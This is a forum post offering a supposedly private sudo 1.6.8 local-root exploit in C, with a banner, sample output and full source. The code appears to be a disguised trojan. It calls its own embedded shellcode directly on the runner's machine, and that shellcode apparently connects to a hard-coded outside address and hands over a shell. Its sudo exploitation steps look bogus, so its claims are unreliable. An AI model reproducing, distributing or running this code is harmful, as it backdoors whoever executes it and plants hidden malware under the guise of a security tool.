Jump to content
kw3rln

Priv8 Version of local exploit SUDO

By kw3rln, in Exploituri

Recommended Posts

kw3rln Newbie

kw3rln

Posted
Posted 
/**************************************************************
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE

* sudo 1.6.8p9 - p12+++ local root
* by HST - Hezuah Security Team Iran
*
* PRIVATE --- DO NOT DISTRIBUTE
*
* Use sudo's use insecure temp file to feed
* buffer overflow. Exploitation:
* izik's method of using JMP %ESP for
* linux-gate.so.1. Searches for JMP %ESP, very
* reliable. But exploit works for *BSD,
* but you have to modify -g to get work.
* Values of 0xbf0caa2b for FreeBSD 6 work.
*
* $ ./spwn -f /tmp/fakefile
* [+] Starting up...
* [+] Finding offset
* [+] Found JMP %ESP @ 0xffffe75f
* [+] Calculating header
* [+] Child calculations
* [+] Writing malicious tmp file
* [+] Getting child offset
* [+] Final value for offset: 0xffffe75f
* # whoami
* root
* #
*
* or ./spwn -f /tmp/fakefile -g 0xbf0caa2b
*
*
* linux-gate: [url]http://www.milw0rm.com/papers/55[/url]
*
* ~censored~ whitehats - hack the planet: #hezuah

PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
**************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/utsname.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <time.h>

unsigned char lincode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x42\x0b\x75\xb6\x66\x68"
"\x23\x29\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

unsigned char bsdcode[] =
"\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x42\x0b\x75\xb6\xcd\x80"
"\x68\x10\x02\x23\x29\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58"
"\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80";

#define OS_LINUX 0
#define OS_BSD 1
#define CMD "/bin/sh"

int OS;
char **k;
unsigned long BSDoffset;

//sighandler_t sighandle(int a)
//{
// return;
//}

unsigned long find_esp(unsigned long offset) {
int i;
char *ptr = (char *) offset;

for (i = 0; i < 4095; i++) {
if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') {
printf("[+] Found JMP %%ESP @ 0x%08x\n", ptr+i);
return (unsigned long) ptr+i;
}
}

printf("[-] Didn't find JMP %%ESP, but trying anyway...\n");
return ((unsigned long)ptr);
/* sometimes this actually works, why? */
}

void revert(char *p,unsigned int size)
{
char *ptr = p;
int i = 0;
char *q = p + size; //end

for(; p <= q; p +=4)
{
*p ^= *(p+3);
*(p+3) ^= *p;
*p ^= *(p+3);

*(p+1) ^= *(p+2);
*(p+2) ^= *(p+1);
*(p+1) ^= *(p+2);
}
}

void set_bytes(char *o, long word)
{
o[0]=word&0xff;
o[1]=(word>>8)& 0xff;
o[2]=(word>>16)&0xff;
o[3]=(word>>24)&0xff;
}

char *sudo_own(char *file, unsigned long offset,int mode,int ovr)
{
char *own = NULL;
char *file_ = calloc(strlen(file) + 20,sizeof(char));
int (*get_bytes)();
int cnt = 0;
int fp;
struct timeval tv;

if(offset & 0xffff != 0xe000 || offset & 0xffff0000 != 0xffff0000)
offset = 037777760000;
printf("[+] Starting up...\n");

if(OS == OS_LINUX)
{
own = malloc(sizeof(lincode) + 25);
memcpy(own+24,lincode,sizeof(lincode)); get_bytes = (int(*)())lincode;
}
else
{
own = malloc(sizeof(bsdcode) + 25);
memcpy(own+24,bsdcode,sizeof(bsdcode)); get_bytes = (int(*)())bsdcode;
}

printf("[+] Finding offset\n");
memcpy(own+4,&offset,sizeof(unsigned long));
set_bytes(own + 4,offset);

printf("[+] Calculating header\n");
for(cnt = 0; cnt < 16; cnt++)
own[cnt] += (offset ^ 0xff & cnt);
revert(own,cnt);

strcpy(own + 16,file);

if(!fork())
{
cnt = 0;
//signal(1,sighandle); signal(2,sighandle);
printf("[+] Child calculations\n");
gettimeofday(&tv,NULL);
tv.tv_sec &= 0xfffffe00;
snprintf(file_,strlen(file) + 20,"%s.%d.%d",file,getuid() + ovr,tv.tv_sec);
if((fp = open(file_,O_CREAT | O_EXCL)) == -1)
_exit(-1);

printf("[+] Writing malicious tmp file\n");
write(fp,own,30);

printf("[+] Getting child offset\n");
close(fp);
offset = get_bytes();

execl("/usr/sbin/sudo","-z","--tmpfile",file,CMD+offset);
}

sleep(1);
printf("[+] Final value for offset: 0x%08x\n",offset);
if(offset % (++cnt * 3))
printf("[-] Improper value for offset, try -g, -t, or -o\n"),exit(0);

return own;
}

int main(int argc, char **argv)
{
int c = 0;
char *file = NULL;
unsigned long offset = 0xffffe000;
struct utsname u;

int t_mode = 0, try_overwrite = 0;
k = argv;

while((c = getopt(argc,argv,"hvf:g:to")) != -1)
{
switch(c)
{
case 'h':
case 'v':
printf("~censored~ read the source code\n");
exit(0);
case 'f':
file = optarg;
break;
case 'g':

offset = strtoul(optarg+2,NULL,16);
break;
case 't':
t_mode = 1;
break;
case 'o':
try_overwrite = 1;
break;
default:
goto START;
}
}
START:
if(file == NULL)
fprintf(stderr,"specify a file with -f\n"),exit(-1);

uname(&u);
if(strstr(u.sysname,"BSD") != NULL)
OS = OS_BSD;
else
OS = OS_LINUX;

execl("/usr/sbin/sudo","-b","-z",
sudo_own(file,offset,t_mode,try_overwrite));
perror("execl");

return 0;
}

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...